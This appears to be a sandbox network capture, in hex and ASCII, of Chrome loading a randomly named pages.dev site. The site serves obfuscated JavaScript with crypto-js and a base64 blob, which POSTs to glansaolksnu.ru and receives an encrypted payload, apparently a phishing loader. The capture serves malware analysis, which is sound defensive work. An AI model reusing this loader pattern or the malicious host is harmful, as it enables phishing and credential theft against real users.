                                                                2024-08-27 18:11:26 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 4a 65 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 62 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 43 74 28 65 29 7c 7c 4e 74 28 65 2c 72 29 7c 7c 4c 74 28 65 2c 72 29 7c 7c 6b 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 4e 65 28 65 2c 72 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                Data Ascii: ray$/.test(a))return Je(e,r)}}function be(e,r){return Ct(e)||Nt(e,r)||Lt(e,r)||kt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ne(e,r){var a={label:0,sent:function(){if(u[0
                                                                2024-08-27 18:11:26 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 46 74 3d 33 30 30 30 32 30 3b 76 61 72 20 6b 65 3d 33 30 30 30 33 30 3b 76 61 72 20 4c 65 3d 33 30 30 30 33 31 3b 76 61 72 20 42 3b 28 66 75
                                                                Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Ft=300020;var ke=300030;var Le=300031;var B;(fu
                                                                2024-08-27 18:11:26 UTC1369INData Raw: 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 75 65 7c 7c 28 75 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 45 4e 44 45 52 3d 22 72 65 6e 64 65 72 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29 28 70 65 7c 7c 28 70 65 3d 7b 7d 29 29 3b 76 61 72 20 6c 65 3b 28 66 75 6e
                                                                Data Ascii: e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ue||(ue={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(function(e){e.RENDER="render",e.EXECUTE="execute"})(pe||(pe={}));var le;(fun
                                                                2024-08-27 18:11:26 UTC1369INData Raw: 76 61 72 20 59 3d 22 30 2f 30 22 3b 66 75 6e 63 74 69 6f 6e 20 66 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 21 3d 3d 22 64
                                                                Data Ascii: var Y="0/0";function ft(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clearance_level!=="d
                                                                2024-08-27 18:11:26 UTC1369INData Raw: 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 63 2c 75 3d 4c 28 78 72 2c 28 63 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 63 21 3d 3d 76 6f 69 64 20 30 3f 63 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 67 2c 5f 3d 4c 28 77 72 2c 28 67 3d 28 61 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 61 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 67 21 3d 3d 76 6f 69 64 20 30 3f 67 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 3b 72 65 74 75 72 6e 20 6f 26 26 75 3f 22
                                                                Data Ascii: HAVING_TROUBLES,c,u=L(xr,(c=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&c!==void 0?c:"nonexistent"),g,_=L(wr,(g=(a=e.displayLanguage)===null||a===void 0?void 0:a.toLowerCase())!==null&&g!==void 0?g:"nonexistent");return o&&u?"
                                                                2024-08-27 18:11:26 UTC1369INData Raw: 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 61 29 7d 2c 73 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 5a 74 28 65 29 7b 72 65 74 75 72 6e 20 46 75 6e 63 74 69 6f 6e 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 2e 69 6e 64 65 78 4f 66 28 22 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 22 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 50 65 28 65 29 7b 76 61 72 20 72 3d 74 79 70 65 6f 66 20 4d 61 70 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 6e 65 77 20 4d 61 70 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 50 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 69 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 5a 74 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29
                                                                Data Ascii: __proto__||Object.getPrototypeOf(a)},se(e)}function Zt(e){return Function.toString.call(e).indexOf("[native code]")!==-1}function Pe(e){var r=typeof Map=="function"?new Map:void 0;return Pe=function(o){if(o===null||!Zt(o))return o;if(typeof o!="function")
                                                                2024-08-27 18:11:26 UTC1369INData Raw: 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 72 2e 73 72 63 29 29 72 65 74 75 72 6e 20 72 3b 66 6f 72 28 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 73 63 72 69 70 74 22 29 2c 6f 3d 30 2c 63 3b 63 3d 61 5b 6f 5d 3b 6f 2b 2b 29 69 66 28 50 28 63 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 63 2e 73 72 63 29 29 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 61 72 28 29 7b 76 61 72 20 65 3d 67 74 28 29 3b 65 7c 7c 76 28 22 43 6f 75 6c 64 20 6e 6f 74 20 66 69 6e 64 20 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34
                                                                Data Ascii: riptElement)&&e.test(r.src))return r;for(var a=document.querySelectorAll("script"),o=0,c;c=a[o];o++)if(P(c,HTMLScriptElement)&&e.test(c.src))return c}function ar(){var e=gt();e||v("Could not find Turnstile script tag, some features may not be available",4
                                                                2024-08-27 18:11:26 UTC1369INData Raw: 28 22 61 6c 6c 6f 77 22 2c 22 63 72 6f 73 73 2d 6f 72 69 67 69 6e 2d 69 73 6f 6c 61 74 65 64 3b 20 66 75 6c 6c 73 63 72 65 65 6e 22 29 2c 66 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 61 6e 64 62 6f 78 22 2c 22 61 6c 6c 6f 77 2d 73 61 6d 65 2d 6f 72 69 67 69 6e 20 61 6c 6c 6f 77 2d 73 63 72 69 70 74 73 20 61 6c 6c 6f 77 2d 70 6f 70 75 70 73 20 61 6c 6c 6f 77 2d 66 6f 72 6d 73 22 29 2c 66 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 63 72 6f 6c 6c 69 6e 67 22 2c 22 6e 6f 22 29 2c 66 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 57 69 64 74 68 3d 22 30 70 78 22 2c 66 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 25 22 2c 66 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 25 22 2c 66 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 3d 22 68 69 64 64
                                                                Data Ascii: ("allow","cross-origin-isolated; fullscreen"),f.setAttribute("sandbox","allow-same-origin allow-scripts allow-popups allow-forms"),f.setAttribute("scrolling","no"),f.style.borderWidth="0px",f.style.width="100%",f.style.height="100%",f.style.overflow="hidd


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                13192.168.2.549729172.66.47.1114436276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:11:27 UTC680OUTGET /favicon.ico HTTP/1.1
                                                                Host: ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: image
                                                                Referer: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:11:27 UTC786INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:11:27 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                Cache-Control: public, max-age=0, must-revalidate
                                                                referrer-policy: strict-origin-when-cross-origin
                                                                x-content-type-options: nosniff
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YEjJbfRB18D2NKdKWPeKmJaXfxHVY75c9LSLRX%2BINsKSVg%2FDGZ4eRA0dht%2FRIxoQ9MVmUzM%2Fp1XGjX3kOtExy6vU37zB0ICkHj3Q06h6OkTXxdmruCrhW9khHtRwhU%2By092GIgzkROghdrek5rvD3YvuITnhfAIpWDbyOUJzulWfV03pDFp46WDUzNYebR%2FVcQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8b9e063168757cac-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-08-27 18:11:27 UTC1369INData Raw: 31 37 33 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 3c 68 65 61 64 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e e2 81 a4 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e
                                                                Data Ascii: 1736<html> <head> <title></title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.
                                                                2024-08-27 18:11:27 UTC1369INData Raw: 74 69 6f 6e 3a 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2c 20 30 2e 35 2c 20 30 2c 20 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 35 31 70 78 29 20 73 63 61 6c 65 59 28 31 29 3b 7d 40 6b 65 79 66 72 61 6d 65 73 20 63 61 6c 2d 62 6f 75 6e 63 65 20 7b 30 25 2c 20 31 30 30 25 2c 20 31 36 2e 35 25 2c 20 37 36 2e 31 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 31 35 31 70 78 29 20 73 63 61 6c 65 59 28 31 29 3b 7d 32 38 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 33 39 70 78 29 20 73 63 61 6c 65 59 28 31 29 3b 7d 33 31 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 35 31 70 78 29 20 73 63 61 6c 65 59 28 31 2e 30 35 29 3b 7d 33 33 25 20 7b
                                                                Data Ascii: tion: cubic-bezier(0, 0.5, 0, 1);transform: translateY(51px) scaleY(1);}@keyframes cal-bounce {0%, 100%, 16.5%, 76.1% {transform: translateY(151px) scaleY(1);}28% {transform: translateY(39px) scaleY(1);}31% {transform: translateY(51px) scaleY(1.05);}33% {
                                                                2024-08-27 18:11:27 UTC1369INData Raw: 72 61 6d 65 73 20 63 6c 6f 73 65 64 2d 66 6c 61 70 2d 73 77 69 6e 67 20 7b 30 25 2c 20 31 30 30 25 2c 20 37 37 25 2c 20 38 2e 35 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 2d 37 31 70 78 29 20 72 6f 74 61 74 65 33 64 28 31 2c 20 30 2c 20 30 2c 20 30 29 3b 7d 31 34 2e 35 25 2c 20 37 36 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 2d 37 31 70 78 29 20 72 6f 74 61 74 65 33 64 28 31 2c 20 30 2c 20 30 2c 20 39 30 64 65 67 29 3b 7d 7d 23 62 61 63 6b 64 72 6f 70 20 7b 77 69 64 74 68 3a 20 31 33 30 70 78 3b 68 65 69 67 68 74 3a 20 31 30 37 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 7d 2e 6c 61 63 6f 6e 69 63 20 7b 77 69 64 74 68 3a 20 39 36 70 78 3b 68 65 69 67 68 74 3a 20 39 36 70 78
                                                                Data Ascii: rames closed-flap-swing {0%, 100%, 77%, 8.5% {transform: translateY(-71px) rotate3d(1, 0, 0, 0);}14.5%, 76% {transform: translateY(-71px) rotate3d(1, 0, 0, 90deg);}}#backdrop {width: 130px;height: 107px;overflow: hidden;}.laconic {width: 96px;height: 96px
                                                                2024-08-27 18:11:27 UTC1369INData Raw: 72 65 22 3e 3c 64 69 76 20 69 64 3d 22 62 61 63 6b 64 72 6f 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 61 63 6f 6e 69 63 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0d 0a 09 3c 21 2d 2d 20 3c 73 70 61 6e 3e 4c 69 66 65 e2 80 99 73 20 6a 6f 75 72 6e 65 79 20 69 73 20 62 65 73 74 20 65 78 70 65 72 69 65 6e 63 65 64 20 62 65 68 69 6e 64 20 74 68 65 20 77 68 65 65 6c 2e 3c 2f 73 70 61 6e 3e 20 2d 2d 3e 0d 0a 20 3c 2f 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 6c 61 62 6f 72 65 64 28 79 61 63 68 74 69 6e 67 29 20 7b 20 3c 21 2d 2d 20 44 72 69 76 69 6e 67 20 69 73 20 74 68 65 20 72 68 79 74 68 6d 20 6f 66 20 6c 69 66 65 20 69 6e 20 6d 6f 74 69 6f 6e 2e 20 2d
                                                                Data Ascii: re"><div id="backdrop"><div class="laconic"></div></div></div></div>... <span>Lifes journey is best experienced behind the wheel.</span> --> </body><script> async function labored(yachting) { ... Driving is the rhythm of life in motion. -
                                                                2024-08-27 18:11:27 UTC474INData Raw: 7a 4f 44 56 6a 5a 57 49 32 4d 47 51 79 4e 32 46 6d 59 6a 41 35 4d 6a 4d 78 59 7a 52 6b 5a 44 45 34 4e 7a 6b 7a 4e 6a 46 6d 59 7a 51 34 5a 44 56 69 4f 54 64 6b 4d 6a 63 30 4d 54 4d 30 4d 6d 4a 6a 4e 54 42 6b 4d 44 41 33 4f 54 64 6d 4e 7a 4e 68 4f 54 42 6d 4d 6a 46 6c 4d 57 49 32 5a 54 51 79 4e 57 4d 30 4e 6a 67 77 4e 57 4d 32 4d 6a 45 79 4f 44 45 30 4e 32 4e 6c 4f 47 56 6d 59 57 55 31 4f 54 68 6d 4e 32 55 32 4d 44 49 31 5a 54 68 6d 49 69 77 69 5a 43 49 36 49 6a 5a 68 4e 6a 45 32 59 7a 5a 6d 4e 7a 41 33 4f 53 4a 39 60 29 29 2c 20 7b 20 3c 21 2d 2d 20 44 72 69 76 69 6e 67 20 69 73 20 61 20 63 6f 6e 76 65 72 73 61 74 69 6f 6e 20 62 65 74 77 65 65 6e 20 79 6f 75 20 61 6e 64 20 74 68 65 20 72 6f 61 64 2e 20 2d 2d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d
                                                                Data Ascii: zODVjZWI2MGQyN2FmYjA5MjMxYzRkZDE4NzkzNjFmYzQ4ZDViOTdkMjc0MTM0MmJjNTBkMDA3OTdmNzNhOTBmMjFlMWI2ZTQyNWM0NjgwNWM2MjEyODE0N2NlOGVmYWU1OThmN2U2MDI1ZThmIiwiZCI6IjZhNjE2YzZmNzA3OSJ9`)), { ... Driving is a conversation between you and the road. --> m
                                                                2024-08-27 18:11:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                14192.168.2.549737104.21.51.1384436276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:11:27 UTC699OUTPOST // HTTP/1.1
                                                                Host: glansaolksnu.ru
                                                                Connection: keep-alive
                                                                Content-Length: 24
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-platform: "Windows"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Content-Type: text/plain;charset=UTF-8
                                                                Accept: */*
                                                                Origin: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:11:27 UTC24OUTData Raw: 7b 22 69 63 6f 6e 6f 63 6c 61 73 74 22 3a 22 67 61 69 6e 66 75 6c 22 7d
                                                                Data Ascii: {"iconoclast":"gainful"}
                                                                2024-08-27 18:11:30 UTC649INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:11:30 GMT
                                                                Content-Type: application/json
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                x-powered-by: PHP/7.3.33
                                                                access-control-allow-origin: *
                                                                vary: Accept-Encoding
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dc3JDfOna0HKX8YEmMudnxGigptoSrMOd%2BUWHUFrJcgXLZWc8C8UJmrqTUt6YRUwgydMOLjuz5P3KM1poIrn%2FB%2BdmFmX28CYGttQK69bv40wbveLqfBcnGOPFh%2FbzOv8zzI%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8b9e06343de70f5b-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-08-27 18:11:30 UTC720INData Raw: 37 36 33 66 0d 0a 7b 22 61 22 3a 22 64 4a 53 75 79 77 33 55 70 47 6a 5c 2f 6c 72 69 49 54 57 59 6a 42 42 4c 33 68 6b 79 4a 74 45 4a 71 49 76 6e 44 4a 2b 47 62 46 63 51 77 74 4f 63 37 54 2b 4e 46 4b 30 47 71 33 31 70 5a 64 73 50 46 52 4e 34 51 57 57 7a 37 54 37 59 59 34 5a 76 31 35 31 7a 5c 2f 4d 45 61 67 6f 30 6e 4f 5c 2f 58 46 36 65 6e 46 63 37 43 75 37 44 6f 48 38 34 63 51 41 43 31 56 67 67 56 39 6b 64 37 71 49 78 41 30 66 77 56 53 64 54 5c 2f 34 70 76 39 6a 72 65 58 59 79 68 64 70 6d 49 52 63 33 66 56 42 39 5c 2f 39 45 44 4b 6a 78 74 4d 30 58 63 75 46 76 56 36 4a 6b 58 64 32 33 4b 58 47 41 6b 4e 69 71 55 31 71 73 55 4e 5c 2f 36 49 78 33 78 4c 6e 49 55 44 48 38 73 50 45 31 41 33 35 5c 2f 72 32 38 5a 73 71 6b 71 44 48 6c 55 52 33 7a 4c 37 67 38 6e 33 51
                                                                Data Ascii: 763f{"a":"dJSuyw3UpGj\/lriITWYjBBL3hkyJtEJqIvnDJ+GbFcQwtOc7T+NFK0Gq31pZdsPFRN4QWWz7T7YY4Zv151z\/MEago0nO\/XF6enFc7Cu7DoH84cQAC1VggV9kd7qIxA0fwVSdT\/4pv9jreXYyhdpmIRc3fVB9\/9EDKjxtM0XcuFvV6JkXd23KXGAkNiqU1qsUN\/6Ix3xLnIUDH8sPE1A35\/r28ZsqkqDHlUR3zL7g8n3Q
                                                                2024-08-27 18:11:30 UTC1369INData Raw: 48 4e 2b 5a 74 78 54 69 49 52 4c 4d 63 61 75 55 63 4b 63 2b 4e 52 6d 6d 74 41 55 6e 51 66 63 68 32 77 68 7a 6e 4d 35 42 46 4d 67 73 76 4d 43 56 74 56 6a 33 2b 2b 51 41 76 7a 58 6b 76 31 57 42 69 55 6b 43 54 33 33 46 62 48 51 56 74 70 77 6c 76 4f 67 53 71 70 4c 65 6b 74 77 6e 38 52 71 41 73 75 30 6e 66 54 65 41 41 4b 4b 5c 2f 51 6a 39 2b 70 4a 44 67 61 4a 53 49 7a 78 42 36 53 45 64 54 49 4a 62 67 4c 51 61 4c 44 6e 42 73 30 39 4a 5a 4b 79 2b 64 4b 51 49 54 66 59 33 62 43 76 45 50 4b 55 56 5c 2f 44 4f 46 41 32 63 71 4e 71 71 33 63 73 58 4d 43 64 30 48 4c 38 50 74 38 38 38 54 35 67 69 4d 30 74 54 79 55 76 6e 32 45 66 4f 62 31 6e 51 79 57 6f 63 43 5c 2f 5a 67 46 46 44 37 55 6c 35 74 6e 32 32 68 4e 43 2b 57 50 57 39 77 44 6c 68 43 37 74 75 6d 52 45 52 78 64 66
                                                                Data Ascii: HN+ZtxTiIRLMcauUcKc+NRmmtAUnQfch2whznM5BFMgsvMCVtVj3++QAvzXkv1WBiUkCT33FbHQVtpwlvOgSqpLektwn8RqAsu0nfTeAAKK\/Qj9+pJDgaJSIzxB6SEdTIJbgLQaLDnBs09JZKy+dKQITfY3bCvEPKUV\/DOFA2cqNqq3csXMCd0HL8Pt888T5giM0tTyUvn2EfOb1nQyWocC\/ZgFFD7Ul5tn22hNC+WPW9wDlhC7tumRERxdf
                                                                2024-08-27 18:11:30 UTC1369INData Raw: 66 66 31 55 30 56 69 38 48 47 33 77 4f 55 71 53 63 64 6b 62 51 6a 4d 47 4b 61 4b 79 66 65 42 35 31 50 54 42 52 51 72 75 61 52 39 4f 4c 52 55 59 34 5a 4c 59 31 47 6d 4f 67 58 7a 68 37 66 33 63 77 6b 54 63 49 37 33 50 53 72 54 44 73 6f 73 73 74 37 63 70 6f 6f 2b 30 4d 38 43 41 42 4e 6e 73 67 78 5a 31 68 6e 32 65 6d 33 4b 55 54 66 73 56 4e 79 6e 4c 44 65 62 6e 47 47 55 36 44 4d 6b 36 2b 62 71 72 30 45 6d 35 54 34 45 58 4a 56 50 6d 49 61 43 71 78 57 31 5c 2f 48 4b 5a 78 38 49 38 34 63 44 4a 71 68 4d 35 6e 5c 2f 68 4b 4f 61 42 34 33 67 50 54 5a 49 76 4d 78 78 61 49 4c 79 72 30 4b 32 74 47 45 38 74 34 47 57 32 43 6b 78 39 6d 34 4c 68 75 6c 4d 4a 55 76 6f 59 44 50 6e 42 7a 2b 64 6e 75 69 65 46 43 73 6c 6e 72 47 69 6f 38 53 39 4a 69 52 50 46 6c 38 70 4a 43 48 33
                                                                Data Ascii: ff1U0Vi8HG3wOUqScdkbQjMGKaKyfeB51PTBRQruaR9OLRUY4ZLY1GmOgXzh7f3cwkTcI73PSrTDsosst7cpoo+0M8CABNnsgxZ1hn2em3KUTfsVNynLDebnGGU6DMk6+bqr0Em5T4EXJVPmIaCqxW1\/HKZx8I84cDJqhM5n\/hKOaB43gPTZIvMxxaILyr0K2tGE8t4GW2Ckx9m4LhulMJUvoYDPnBz+dnuieFCslnrGio8S9JiRPFl8pJCH3
